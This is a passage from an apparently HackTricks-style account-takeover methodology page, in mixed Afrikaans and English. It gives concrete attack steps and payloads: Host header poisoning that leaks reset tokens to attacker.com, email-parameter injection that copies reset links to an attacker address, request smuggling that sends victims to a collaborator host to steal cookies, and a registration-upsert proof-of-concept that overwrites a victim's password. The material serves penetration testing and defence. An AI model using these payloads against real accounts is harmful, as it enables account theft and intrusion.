def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: stuur dieselfde geldige OTP terselfdertyd in twee sessies in; soms word een sessie 'n verified attacker account terwyl die slagoffer‑vloei ook slaag.
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

'n Kragtige klas kwessies gebeur wanneer 'n aanvaller aksies op die slagoffer se e‑pos uitvoer voordat die slagoffer hul rekening skep, en later weer toegang herwin.

Sleutel tegnieke om te toets (pas aan by die teiken se vloei):

- Classic–Federated Merge
- Aanvaller: registreer 'n classic account met die slagoffer se e‑pos en stel 'n wagwoord
- Slagoffer: teken later in met SSO (dieselfde e‑pos)
- Onveilige merges kan beide partye aangeteken laat bly of die aanvaller se toegang herleef
- Unexpired Session Identifier
- Aanvaller: skep rekening en hou 'n long‑lived session (moet nie uitlog nie)
- Slagoffer: herstel/stel later die wagwoord en gebruik die rekening
- Toets of ou sessies geldig bly na reset of MFA aktivering
- Trojan Identifier
- Aanvaller: voeg 'n sekondêre identifier by die vooraf‑geskepte rekening (foon, addisionele e‑pos, of koppel die aanvaller se IdP)
- Slagoffer: herstel wagwoord; aanvaller gebruik later die trojan identifier om te reset/log in
- Unexpired Email Change
- Aanvaller: begin e‑pos‑verandering na aanvaller se mail en hou bevestiging terug
- Slagoffer: herstel die rekening en begin dit gebruik
- Aanvaller: voltooi later die hangende e‑pos‑verandering om die rekening te steel
- Non‑Verifying IdP
- Aanvaller: gebruik 'n IdP wat nie e‑posbesit verifieer nie om `victim@…` te verklaar
- Slagoffer: teken in via die classic route
- Diens merges op e‑pos sonder om `email_verified` te kontroleer of plaaslike verifikasie uit te voer

Praktiese wenke

- Versamel vloei en endpoints vanaf web/mobile bundles. Kyk vir classic signup, SSO linking, email/phone change, en password reset endpoints.
- Skep realistiese outomatisering om sessies lewendig te hou terwyl jy ander vloei toets.
- Vir SSO‑toetse, stel 'n toets OIDC provider op en gee tokens uit met `email` claims vir die slagofferadres en `email_verified=false` om te kontroleer of die RP ongeverifieerde IdPs vertrou.
- Na enige password reset of email change, verifieer dat:
- alle ander sessies en tokens ongeldig gemaak word,
- hangende email/phone change kapabiliteite gekanselleer word,
- voorheen gekoppelde IdPs/emails/phones weer geverifieer word.

Let wel: Uitgebreide metodologie en gevallestudies van hierdie tegnieke word deur Microsoft’s pre‑hijacking research gedokumenteer (sien Verwysings by die einde).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

1. Aanvaller moet met hul rekening aanmeld en na die Change password funksie gaan.
2. Start die Burp Suite en Intercept die request
3. Stuur dit na die repeater tab en wysig die parameters : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

Die password reset token moet lukraak gegenereer wees en elke keer uniek wees.
Probeer bepaal of die token verstryk of of dit altyd dieselfde is; in sommige gevalle is die generasie-algoritme swak en kan dit geraad word. Die volgende veranderlikes kan deur die algoritme gebruik word.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. Triggere ’n password reset versoek using the API/UI for a specific email e.g: test@mail.com
2. Inspekteer die server response and check for resetToken
3. Gebruik dan die token in ’n URL soos https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. Register on the system with a username identical to the victim’s username, but with white spaces inserted before and/or after the username. e.g: "admin "
2. Request a password reset with your malicious username.
3. Use the token sent to your email and reset the victim password.
4. Connect to the victim account with the new password.

Die platform CTFd was vulnerable to this attack.
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : *.domain.com
2. Leak the current sessions cookie
3. Authenticate as the user using the cookie

Account Takeover Via HTTP Request Smuggling

1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Craft a request which will overwrite the POST / HTTP/1.1 with the following data:
   GET http://something.burpcollaborator.net HTTP/1.1 X: with the goal of open redirect the victims to burpcollab and steal their cookies\
3. Die finale request kan soos volg lyk

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone-rapporte wat hierdie bug uitgebuit het\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Account Takeover via CSRF

1. Skep ’n payload vir die CSRF, bv.: “HTML form with auto submit for a password change”
2. Stuur die payload

Account Takeover via JWT

JSON Web Token kan gebruik word om ’n gebruiker te verifieer.

• Wysig die JWT met ’n ander User ID / Email
• Kontroleer vir swak JWT-handtekening

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Sommige signup handlers voer ’n upsert uit wanneer die verskafde email reeds bestaan. As die endpoint ’n minimale body met ’n email en password aanvaar en nie eienaarskapverifikasie afdwing nie, sal die stuur van die slagoffer se email hul password pre-auth oorskryf.

• Discovery: oes endpoint name uit gebundelde JS (of mobile app traffic), en fuzz dan basispade soos /parents/application/v4/admin/FUZZ met ffuf/dirsearch.
• Metode wenke: ’n GET wat boodskappe teruggee soos “Only POST request is allowed.” dui dikwels op die korrekte werkwoord en dat ’n JSON body verwag word.
• Minimale body waargeneem in die veld:

{"email":"victim@example.com","password":"New@12345"}

Voorbeeld PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Impak: Volledige Account Takeover (ATO) sonder enige reset token, OTP, of email verification.

Verwysings

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.